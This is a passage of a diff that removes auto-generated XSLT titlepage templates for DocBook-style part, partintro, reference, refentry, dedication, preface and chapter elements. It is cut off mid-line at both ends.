select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="partintro.titlepage.recto"> - <xsl:choose> - <xsl:when test="partintroinfo/title"> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/title"/> - </xsl:when> - <xsl:when test="docinfo/title"> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="partintroinfo/subtitle"> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/corpauthor"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/corpauthor"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/authorgroup"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/authorgroup"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/author"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/author"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/othercredit"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/othercredit"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/releaseinfo"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/copyright"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/copyright"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/legalnotice"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/legalnotice"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/pubdate"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/pubdate"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/revision"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/revision"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/revhistory"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/revhistory"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/abstract"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/abstract"/> - <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="partintro.titlepage.verso"> -</xsl:template> - -<xsl:template name="partintro.titlepage.separator"> -</xsl:template> - -<xsl:template name="partintro.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="partintro.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="partintro.titlepage"> - <div> - <div> - <xsl:call-template name="partintro.titlepage.before.recto"/> - <xsl:call-template name="partintro.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="partintro.titlepage.before.verso"/> - <xsl:call-template name="partintro.titlepage.verso"/> - </div> - <xsl:call-template name="partintro.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="partintro.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="partintro.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="partintro.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="partintro.titlepage.recto.style"> -<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="reference.titlepage.recto"> - <xsl:choose> - <xsl:when test="referenceinfo/title"> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/title"/> - </xsl:when> - <xsl:when test="docinfo/title"> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="referenceinfo/subtitle"> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/corpauthor"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/corpauthor"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/authorgroup"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/authorgroup"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/author"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/author"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/othercredit"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/othercredit"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/releaseinfo"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/copyright"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/copyright"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/legalnotice"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/legalnotice"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/pubdate"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/pubdate"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/revision"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/revision"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/revhistory"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/revhistory"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/abstract"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/abstract"/> - <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="reference.titlepage.verso"> -</xsl:template> - -<xsl:template name="reference.titlepage.separator"><hr/> -</xsl:template> - -<xsl:template name="reference.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="reference.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="reference.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="reference.titlepage.before.recto"/> - <xsl:call-template name="reference.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="reference.titlepage.before.verso"/> - <xsl:call-template name="reference.titlepage.verso"/> - </div> - <xsl:call-template name="reference.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="reference.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="reference.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="reference.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="reference.titlepage.recto.style"> -<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="refentry.titlepage.recto"> -</xsl:template> - -<xsl:template name="refentry.titlepage.verso"> -</xsl:template> - -<xsl:template name="refentry.titlepage.separator"> -</xsl:template> - -<xsl:template name="refentry.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="refentry.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="refentry.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="refentry.titlepage.before.recto"/> - <xsl:call-template name="refentry.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="refentry.titlepage.before.verso"/> - <xsl:call-template name="refentry.titlepage.verso"/> - </div> - <xsl:call-template name="refentry.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="refentry.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="refentry.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template name="dedication.titlepage.recto"> - <div xsl:use-attribute-sets="dedication.titlepage.recto.style"> -<xsl:call-template name="component.title"> -<xsl:with-param name="node" select="ancestor-or-self::dedication[1]"/> -</xsl:call-template></div> - <xsl:choose> - <xsl:when test="dedicationinfo/subtitle"> - <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="dedicationinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - -</xsl:template> - -<xsl:template name="dedication.titlepage.verso"> -</xsl:template> - -<xsl:template name="dedication.titlepage.separator"> -</xsl:template> - -<xsl:template name="dedication.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="dedication.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="dedication.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="dedication.titlepage.before.recto"/> - <xsl:call-template name="dedication.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="dedication.titlepage.before.verso"/> - <xsl:call-template name="dedication.titlepage.verso"/> - </div> - <xsl:call-template name="dedication.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="dedication.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="dedication.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="subtitle" mode="dedication.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="dedication.titlepage.recto.style"> -<xsl:apply-templates select="." mode="dedication.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="preface.titlepage.recto"> - <xsl:choose> - <xsl:when test="prefaceinfo/title"> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/title"/> - </xsl:when> - <xsl:when test="docinfo/title"> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="prefaceinfo/subtitle"> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/corpauthor"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/corpauthor"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/authorgroup"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/authorgroup"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/author"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/author"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/othercredit"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/othercredit"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/releaseinfo"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/copyright"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/copyright"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/legalnotice"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/legalnotice"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/pubdate"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/pubdate"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/revision"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/revision"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/revhistory"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/revhistory"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/abstract"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="docinfo/abstract"/> - <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="preface.titlepage.verso"> -</xsl:template> - -<xsl:template name="preface.titlepage.separator"> -</xsl:template> - -<xsl:template name="preface.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="preface.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="preface.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="preface.titlepage.before.recto"/> - <xsl:call-template name="preface.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="preface.titlepage.before.verso"/> - <xsl:call-template name="preface.titlepage.verso"/> - </div> - <xsl:call-template name="preface.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="preface.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="preface.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="preface.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="preface.titlepage.recto.style"> -<xsl:apply-templates select="." mode="preface.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="chapter.titlepage.recto"> - <xsl:choose> - <xsl:when test="chapterinfo/title"> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/title"/> - </xsl:when> - <xsl:when test="docinfo/title"> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="chapterinfo/subtitle"> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="chapterinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="chapter.titlepage.recto.auto.mode" 